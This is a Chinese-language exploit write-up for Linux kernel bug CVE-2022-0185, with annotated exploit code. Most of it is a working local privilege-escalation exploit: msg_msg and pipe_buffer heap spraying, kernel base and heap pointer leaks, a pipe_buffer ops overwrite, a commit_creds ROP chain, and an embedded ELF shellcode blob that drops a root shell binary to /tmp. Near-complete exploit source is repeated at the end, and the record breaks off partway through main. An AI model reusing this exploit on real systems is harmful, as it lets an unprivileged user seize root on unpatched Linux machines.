CVE-2022-0185

这是一个关于整型溢出的CVE。

static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param) {
	/*
	 * Appends one mount option ("key" or "key=value") to the legacy
	 * mount-data buffer of the fs_context. Quoted as in the write-up; the
	 * author's elisions ([ ... ]) are left in place.
	 */
	struct legacy_fs_context *ctx = fc->fs_private;	// [1] per-context private data (reached through the fsopen() fd)
	unsigned int size = ctx->data_size;				// [2] size: bytes already written into the buffer
	size_t len = 0;
	int ret;
	[ ... ]
	switch (param->type) {
	case fs_value_is_string:
		len = 1 + param->size;						// [3] len = strlen(key) + 1 + strlen(value): bytes about to be written, i.e. the mount-option string key=value
		/* fallthrough: the key length is added for both types */
	case fs_value_is_flag:
		len += strlen(param->key);
		break;
	default:
		return invalf(fc, "VFS: Legacy: Parameter type for '%s' not supported", param->key);
	}
	// [4] Bounds check meant to prevent overflow. The subtraction is
	// unsigned: once size exceeds PAGE_SIZE-2, PAGE_SIZE-2-size wraps to a
	// huge value, the check never fires, and the memcpy below writes past
	// the PAGE_SIZE allocation (CVE-2022-0185). The fixed kernel compares
	// without subtracting: `if (size + len + 2 > PAGE_SIZE)`.
	if (len > PAGE_SIZE-2-size) return invalf(fc, "VFS: Legacy: Cumulative options too large");
	[ ... ]
	if (!ctx->legacy_data) {
		ctx->legacy_data = kmalloc(PAGE_SIZE, GFP_KERNEL);	// [5] the first call allocates the PAGE_SIZE (4096-byte) buffer
		if (!ctx->legacy_data) return -ENOMEM;
	}
	ctx->legacy_data[size++] = ',';      			// [6] write into the buffer: a comma, then the key, then '=', then the value, a NUL terminator at the end, and finally store the new size
	len = strlen(param->key);
	memcpy(ctx->legacy_data + size, param->key, len);
	size += len;
	if (param->type == fs_value_is_string) {
		ctx->legacy_data[size++] = '=';
		memcpy(ctx->legacy_data + size, param->string, param->size);
		size += param->size;
	}
	ctx->legacy_data[size] = '\0';
	ctx->data_size = size;
	ctx->param_type = LEGACY_FS_INDIVIDUAL_PARAMS;
	return 0;
}

这是触发漏洞的函数:size 每次调用都会累加,当 size 超过 PAGE_SIZE-2 之后,检查中的 PAGE_SIZE-2-size 会发生下溢;由于 size 是 unsigned 类型,结果会回绕成一个极大的数,边界检查随之失效。

具体介绍可以看【kernel exploit】CVE-2022-0185 File System Context 整数溢出漏洞利用 — bsauce

本文主要介绍提权方法。

step1

泄露kbase。其实很明显,覆盖msg_msg->m_ts泄露stat,或者tty什么的也可以,一个kmalloc-4k的slab有8个object,为了防止一开始object布局乱七八糟的,我采用先分配8个msg_msg,再分配victim object,再分配8个msg_msg来泄露基址,覆盖的成功率很高,只是kmalloc-32的下一个不一定是stat,这一步成功的概率大概1/2。

当然,这也和我固定取 leak[510] 有关,改用搜索的方法,成功率应该能接近 100%。

 printf("[+] STEP1-------------------------------[+]\n");
 /* Step 1 of the write-up: leak the kernel base. Message queues are placed
  * on both sides of the fs_context buffer so the overflow lands on a msg_msg
  * header; the clobbered queue is then located by reading the queues back. */
 for(;i<7;i++){
     qu[i]=get_msg_queue();
     buf[5]=i+1;                    /* tag the payload with the queue number */
     write_msg(qu[i],buf,4060,1);
 }
 fd = fsopen("ext4", 0);
 if(fd<0)err_exit("open ext4");
 printf("[+] start to overflow!!!\n");
 strcpy(pat, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
 i=0;
 /* Each option advances the kernel's data_size by 1 + 1 + strlen(pat); the
  * count is chosen so the buffer ends up just below PAGE_SIZE. */
 for (; i < 117; i++)
     fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);
 printf("[+] start to spray stat!!!\n");
 i=0;
 for(;i<0x100;i++){
     stat[i]=open("/proc/self/stat",0);
 }
 //1+21+1+1=24
 pat[21]='\x00';
 fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);
 i=7;
 for(;i<20;i++){
     qu[i]=get_msg_queue();
     buf[5]=i+1;
     write_msg(qu[i],buf,4060,1);
 }
 /* Value written over the neighbouring msg_msg->m_ts (0x1060 little-endian);
  * the author's comment below says 0x2050, which looks stale — peek_msg()
  * below expects 0x1060. */
 char* m_ts="\x60\x10\x00";
 fsconfig(fd,FSCONFIG_SET_STRING,"\x00",m_ts,0);
 //m_ts=0x2050
 i=0;
 for(;i<20;i++){
     memset(leak,0,10000);
     res=peek_msg(qu[i],leak,0x1060,0);
     if(res<0)err_exit("peek_msg");
     if(res==0x1060){
         /* leak[510] is taken as a kernel text pointer; 0x1336770 is its
          * offset from the base in the author's target build. */
         kbase=leak[510]-0x1336770;
         break;
     }
 }
 //sleep(10);
 if(kbase==0||(kbase&0xfff)!=0){            /* sanity check: base must be page-aligned */
     printf("[-] leak kbase false!!!\n");
     exit(0);
 }
 printf("[+] kbase:%lx;\n",kbase);

step2

这一步是泄露堆地址,因为我采用打pipe_buffer的方法,需要已知地址布置fake_ops。本CVE貌似开启了harden freelist,所以采用泄露msg_msg->next的方法来获取堆地址,构造kmalloc-1k-->kmalloc-64-->kmalloc-512的格局进行堆喷,泄露kmalloc-64上的msg_msg的next指针,其实只构造kmalloc-64-->kmalloc-512就可以了.......

 printf("[+] STEP2-------------------------------[+]\n");
 /* Step 2 of the write-up: leak a heap address by overwriting a msg_msg
  * header again, this time reading far enough to reach the `next` pointer
  * of a msg_msg in the kmalloc-64 slab. */
 i=0;
 for(;i<8;i++){
     qr[i]=get_msg_queue();
     buf[5]=i+1;
     write_msg(qr[i],buf,4080,1);
 }
 fd = fsopen("ext4", 0);
 if(fd<0)err_exit("open ext4");
 printf("[+] start to overflow!!!\n");
 strcpy(pat, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
 i=0;
 for (; i < 117; i++)
     fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);
 pat[21]='\x00';
 fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);
 i=8;
 for(;i<16;i++){
     qr[i]=get_msg_queue();
     buf[5]=i+1;
     write_msg(qr[i],buf,4080,1);
 }
 char* evn="\x50\x16\x00";               /* new m_ts value: 0x1650 */
 fsconfig(fd,FSCONFIG_SET_STRING,"\x00",evn,0);
 printf("[+] start to spray heap_addr!!!\n");
 spray_msg();                            /* kmalloc-1k -> 64 -> 512 layout (see write-up) */
 memset(leak,0,8000);
 i=0;
 for(;i<16;i++){
     res=peek_msg(qr[i],leak,0x1650,0);
     if(res<0)perror("peek_msg");
     if(res==0x1650){
         /* Scan the copied-out data for the m_type (10 is not a type used
          * here, so the author treats it as a marker) and take the two
          * words before it as the leaked pointers. */
         int j=0;
         for(;j<1000;j++){
             if(leak[j]==10){
                 pipe_ff=leak[j-2];
                 gadget=leak[j-3]+0x30;
                 break;
             }
         }
         break;
     }
 }
 if(pipe_ff==0){
     printf("[-] leak heap_addr false!!!\n");
     exit(0);
 }
 printf("[+] pipe_ff:%lx;\n",pipe_ff);
 printf("[+] gadget:%lx;\n",gadget);

很明显,我们要在kmalloc-512上布置fake_ops,当然,我采用pt_regs的方法,所以其实就是堆喷`add rsp`这个gadget就可以了。

step3

到提权了。我看原有 exp 貌似是将 msg_msg->next 指向 pipe_buffer-0x30 来构造 UAF,但感觉把 msg_msg 前两个指针搞烂了,应该容易报错,我也没细看它是怎么绕过的。但其实我们能修改 pipe_buffer 的大小,细节可以看我前一篇文章:我将 pipe_buffer 修改为 kmalloc-4k,然后把 ops 覆盖为之前泄露的 kmalloc-512+0x30 就好了,用 msg_msg 在 kmalloc-512 上堆喷 gadget。

printf("[+] STEP3-------------------------------[+]\n");
/* Step 3 of the write-up: spray pipe_buffer arrays around the fs_context
 * buffer, then overwrite one of them so its ops pointer becomes `gadget`. */
printf("[+] start to spray pipe_buffer!!!\n");
i=0;
for(;i<30;i++)
    pipe(pipe_fd[i]);
i=0;
for(;i<10;i++)
    fcntl(pipe_fd[i][1],F_SETPIPE_SZ,0x1000*64);   /* resize: moves the buffer array to a larger slab */
fd = fsopen("ext4", 0);
if(fd<0)err_exit("open ext4");
printf("[+] start to overflow!!!\n");
strcpy(pat, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
i=0;
for (; i < 117; i++)
    fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);
i=10;
for(;i<30;i++)
    fcntl(pipe_fd[i][1],F_SETPIPE_SZ,0x1000*64);
char value[40];
memset(value,0x41,40);
memcpy(value+15,&gadget,8);             /* gadget lands on the ops field of the neighbouring pipe_buffer */
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", value, 0);
printf("[+] STEP4-------------------------------[+]\n");
/* Step 4: free the step-2 spray, resolve kernel addresses from kbase
 * (offsets are specific to the author's target build) and spray the
 * kmalloc-512 slab with the `add_rsp` gadget. */
printf("[+] start to spray gadgets!!!\n");
close_msg();
pop_rdi=kbase+0x10475ed;
commit_creds=kbase+0x10c9f00;
init_cred=kbase+0x286b7a0;
add_rsp=kbase+0x18abf50;
restore=kbase+0x1e00fb8;
spray_gadget();
printf("[+] start to hijack control flow!!!\n");
i=0;
for(;i<30;i++){
    close(pipe_fd[i][0]);
    /* Register values staged for the pt_regs technique the write-up
     * describes; closing the write end releases the pipe_buffer and
     * is what invokes the overwritten ops. Intel syntax: the file must be
     * built with -masm=intel (presumed). */
    __asm__("mov r15,pop_rdi;"
            "mov r14,init_cred;"
            "mov r13,commit_creds;"
            "mov r12,restore;"
            "mov rbp,0xdeadbeef;"
            "mov rbx,0xdeadbeef;"
            "mov r11,0xdeadbeef;"
            "mov r10,0xdeadbeef;"
            "mov r9,0xdeadbeef;"
            "mov r8,0xdeadbeef");
    close(pipe_fd[i][1]);
}
get_shell();
return 0;

problem

现在的问题是:无论执行 system('/bin/sh')、execve('/bin/sh',0,0),还是用 signal 注册一下处理函数,都会造成 segmentation fault,无法稳定地保持 uid==0。

其实改成system('cat /flag')能将flag读出来。

/*
 * Writes the embedded ELF image below to /tmp/w and marks it executable.
 * Per the write-up, /tmp/w is what get_shell() exec's once the process is
 * uid 0. Notes for review:
 *  - the two `return -1;` statements are in a void function (a leftover
 *    from an int-returning version; compiles with a warning);
 *  - fclose() is not checked, so a failed flush would go unnoticed;
 *  - system() spawns a shell just to chmod; fchmod() on the open stream's
 *    descriptor would avoid that.
 */
void get_flag_file(){
    unsigned char elfcode[] = {
        0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
        0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,
        0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,
        0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,
        0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,
        0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,
        0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,
        0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,
        0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,
        0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,
        0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,
        0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
        0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,
        0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,
        0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,
        0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,
        0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,
        0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,
        0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00};
    FILE *fp;
    fp = fopen("/tmp/w", "wb");
    if (fp == NULL) {
        perror("fopen");
        return -1;                      /* value returned from a void function */
    }
    if (fwrite(elfcode, sizeof(elfcode), 1, fp) < 1) {
        perror("fwrite");
        return -1;                      /* same; fp is also leaked on this path */
    }
    fclose(fp);                         /* result unchecked */
    system("chmod +x /tmp/w");
    return;
}

最后只能execve('/tmp/w',0,0),然后自己去执行/tmp/sh,能够让uid==0。

以下是完整exp

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#define FSCONFIG_SET_STRING 1
#define fsopen(name, flags) syscall(__NR_fsopen, name, flags)
#define fsconfig(fd, cmd, key, value, aux) syscall(__NR_fsconfig, fd, cmd, key, value, aux)

/* Userland mirrors of the kernel's SysV message structures; every field is
 * kept as a plain uint64_t so that leaked bytes can be overlaid on them. */
struct list_head {
    uint64_t    next;
    uint64_t    prev;
};
struct msg_msg {
    struct list_head m_list;
    uint64_t    m_type;
    uint64_t    m_ts;
    uint64_t    next;
    uint64_t    security;
};
struct msg_msgseg {
    uint64_t    next;
};
/*
 * Left commented out — presumably because glibc's <sys/msg.h> already
 * declares struct msgbuf when _GNU_SOURCE is defined (see the top of the
 * file), and write_msg() below relies on that declaration.
struct msgbuf {
    long mtype;
    char mtext[0];
};
*/

/* Creates a private SysV message queue. Returns the queue id, or -1 with
 * errno set (msgget semantics); callers in this file do not check it. */
int get_msg_queue(void)
{
    return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

/* Blocking msgrcv() with no flags: removes one message of type msgtyp from
 * the queue into msgp. Returns the byte count received, or -1. */
int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
 * msgp should point to a `struct msgbuf`; the payload lives in
 * msgbuf.mtext. The first long of the buffer is overwritten with msgtyp
 * before sending, so callers lose whatever they had there.
 * Returns msgsnd()'s result (0 on success, -1 on error).
 */
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    ((struct msgbuf*)msgp)->mtype = msgtyp;
    return msgsnd(msqid, msgp, msgsz, 0);
}

/* Non-destructive read. With MSG_COPY, `msgtyp` is the position of the
 * message on the queue to copy out (it stays queued); MSG_NOERROR truncates
 * instead of failing when the message is larger than msgsz; IPC_NOWAIT never
 * blocks. Returns the byte count copied, or -1. */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

/* Fills every field of a userland msg_msg image from its arguments.
 * Not called by the code shown in this file. */
void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev, uint64_t m_type, uint64_t m_ts,  uint64_t next, uint64_t security)
{
    msg->m_list.next = m_list_next;
    msg->m_list.prev = m_list_prev;
    msg->m_type = m_type;
    msg->m_ts = m_ts;
    msg->next = next;
    msg->security = security;
}

/* Userland cs/ss/rsp/rflags captured by save_status(). Nothing in the code
 * shown here reads them back. */
size_t user_cs, user_ss, user_rflags, user_sp;

/* Snapshots the segment registers, stack pointer and flags into the globals
 * above. The operands are Intel syntax (destination first), so the file is
 * presumably built with -masm=intel. */
void save_status()
{
    asm volatile ("mov user_cs, cs;"
                  "mov user_ss, ss;"
                  "mov user_sp, rsp;"
                  "pushf;"
                  "pop user_rflags;");
    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/* Reports msg via perror(), pauses two seconds so the message is visible
 * before the process goes away, then exits with EXIT_FAILURE. */
void err_exit(char *msg)
{
    perror(msg);
    sleep(2);
    exit(EXIT_FAILURE);
}

/* Pins the calling process to one CPU via sched_setaffinity(); the return
 * value is not checked. */
void bind_core(int core)
{
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/* Moves the process into a fresh user + mount namespace and maps the given
 * uid/gid to 0 inside it ("deny" is written to setgroups first, as the
 * kernel requires before gid_map can be written). The fsopen() calls in
 * main() need CAP_SYS_ADMIN in that user namespace, so systems that forbid
 * unprivileged user namespaces are not reachable by this path.
 * NOTE(review): none of the unshare()/open()/write() results are checked,
 * so a failure here is silent and only shows up later. */
void unshare_setup(uid_t uid, gid_t gid)
{
    int temp;
    char edit[0x100];
    unshare(CLONE_NEWNS|CLONE_NEWUSER);
    temp = open("/proc/self/setgroups", O_WRONLY);
    write(temp, "deny", strlen("deny"));
    close(temp);
    temp = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", uid);
    write(temp, edit, strlen(edit));
    close(temp);
    temp = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", gid);
    write(temp, edit, strlen(edit));
    close(temp);
    return;
}

/*
 * Writes the embedded ELF image below to /tmp/w and marks it executable.
 * Per the write-up, /tmp/w is what get_shell() exec's once the process is
 * uid 0. Notes for review:
 *  - the two `return -1;` statements are in a void function (a leftover
 *    from an int-returning version; compiles with a warning);
 *  - fclose() is not checked, so a failed flush would go unnoticed;
 *  - system() spawns a shell just to chmod; fchmod() on the open stream's
 *    descriptor would avoid that.
 */
void get_flag_file(){
    unsigned char elfcode[] = {
        0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
        0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,
        0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,
        0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,
        0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,
        0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,
        0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,
        0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,
        0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,
        0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,
        0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,
        0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
        0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,
        0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,
        0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,
        0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,
        0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,
        0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,
        0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00};
    FILE *fp;
    fp = fopen("/tmp/w", "wb");
    if (fp == NULL) {
        perror("fopen");
        return -1;                      /* value returned from a void function */
    }
    if (fwrite(elfcode, sizeof(elfcode), 1, fp) < 1) {
        perror("fwrite");
        return -1;                      /* same; fp is also leaked on this path */
    }
    fclose(fp);                         /* result unchecked */
    system("chmod +x /tmp/w");
    return;
}

char* sh="/bin/sh";                     /* not referenced by the code shown here */

/* Installed as the SIGSEGV handler in main() and also called at its end:
 * if the process is already uid 0, exec the dropped /tmp/w; otherwise print
 * a failure message (no newline). NOTE(review): signal() expects a handler
 * of type void(int); this unprototyped `()` signature is not that type. */
void get_shell(){
    if(getuid()==0){
        printf("[+] success!!!\n");
        execve("/tmp/w",NULL,NULL);
    }else{
        printf("[-] something wrong");
    }
}

int kk[100];                            /* queue ids created by spray_msg(), drained by close_msg() */

/* Step-2 heap shaping (write-up: "1k -> 64 -> 512"): 100 queues, each given
 * messages of 800, 10 and 400 bytes in that order. buf is never initialised,
 * so the payload bytes are indeterminate — presumably only the allocation
 * sizes matter here. */
void spray_msg(){
    char buf[10000];
    int j=0;
    for(;j<100;j++){
        kk[j]=get_msg_queue();
        write_msg(kk[j],buf,800,1);
        write_msg(kk[j],buf,10,2);
        write_msg(kk[j],buf,400,3);
    }
    printf("[+] 1k-->64-->512 constructed!!!\n");
}

/* Receives (and thereby frees) the three messages spray_msg() put on each
 * queue, in the same order. */
void close_msg(){
    char buf[10000];
    int j=0;
    for(;j<100;j++){
        read_msg(kk[j],buf,800,1);
        read_msg(kk[j],buf,10,2);
        read_msg(kk[j],buf,400,3);
    }
    printf("[+] msg_msg has been closed\n");
}

int fd;                                 /* fs_context fd returned by fsopen() */
size_t init_cred;                       /* kernel address; set in main() as kbase + build-specific offset */
/* Kernel addresses resolved in main() as kbase + offsets specific to the
 * author's target build. */
size_t commit_creds;
size_t pop_rdi;
size_t heap_addr;                       /* not referenced by the code shown here */
size_t add_rsp;                         /* gadget sprayed by spray_gadget() */
size_t restore;
size_t buf[0x500];                      /* message payload; main() only sets buf[5] before sending */
size_t kbase=0;                         /* leaked kernel base (step 1); checked page-aligned */
size_t pipe_ff=0;                       /* heap pointers pulled from the step-2 leak */
size_t gadget=0;
int stat[0x100];                        /* fds of /proc/self/stat; would clash with stat(2) if <sys/stat.h> were included */
char pat[300]={0};                      /* option value handed to fsconfig() */
int qu[20];                             /* step-1 queue ids */
int qr[16];                             /* step-2 queue ids */
int res;                                /* peek_msg() result */
int i=0;                                /* loop index shared across main(); spray_gadget() shadows it */
size_t leak[2000];                      /* receive buffer for peek_msg() */
int pipe_fd[30][2];                     /* read/write ends of the pipes created in step 3 */

/* Step-4 helper: 4096 queues, each holding a 400-byte message whose bytes
 * are repetitions of the `add_rsp` gadget address (write_msg() replaces the
 * first word with the type 1). gt[] is a 16 KiB stack array, and the local
 * `int i` shadows the global i. */
void spray_gadget(){
    int gt[4096];
    size_t cover[56];
    int j=0;
    for(;j<56;j++)cover[j]=add_rsp;
    int i=0;
    for(;i<4096;i++){
        gt[i]=get_msg_queue();
        write_msg(gt[i],cover,400,1);
    }
    return;
}

/*
 * Exploit driver, following the write-up's steps 1-4. Drops /tmp/w first,
 * installs get_shell() as the SIGSEGV handler (see the "problem" section of
 * the write-up), pins to CPU 0, saves userland register state, and enters a
 * user namespace (needed for fsopen()) before touching the vulnerable path.
 */
int main(){
    get_flag_file();
    signal(SIGSEGV,get_shell);
    bind_core(0);
    save_status();
    unshare_setup(getuid(), getgid());

    printf("[+] STEP1-------------------------------[+]\n");
    /* Step 1: leak the kernel base. Queues are placed on both sides of the
     * fs_context buffer so the overflow lands on a msg_msg header; the
     * clobbered queue is located by reading the queues back. */
    for(;i<7;i++){
        qu[i]=get_msg_queue();
        buf[5]=i+1;                     /* tag the payload with the queue number */
        write_msg(qu[i],buf,4060,1);
    }
    fd = fsopen("ext4", 0);
    if(fd<0)err_exit("open ext4");
    printf("[+] start to overflow!!!\n");
    strcpy(pat, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
    i=0;
    /* Each option advances the kernel's data_size by 1 + 1 + strlen(pat);
     * the count is chosen so the buffer ends up just below PAGE_SIZE. */
    for (; i < 117; i++)
        fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);
    printf("[+] start to spray stat!!!\n");
    i=0;
    for(;i<0x100;i++){
        stat[i]=open("/proc/self/stat",0);
    }
    //1+21+1+1=24
    pat[21]='\x00';
    fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);
    i=7;
    for(;i<20;i++){
        qu[i]=get_msg_queue();
        buf[5]=i+1;
        write_msg(qu[i],buf,4060,1);
    }
    /* Value written over the neighbouring msg_msg->m_ts (0x1060); the
     * author's comment below says 0x2050, which looks stale — peek_msg()
     * below expects 0x1060. */
    char* m_ts="\x60\x10\x00";
    fsconfig(fd,FSCONFIG_SET_STRING,"\x00",m_ts,0);
    //m_ts=0x2050
    i=0;
    for(;i<20;i++){
        memset(leak,0,10000);
        res=peek_msg(qu[i],leak,0x1060,0);
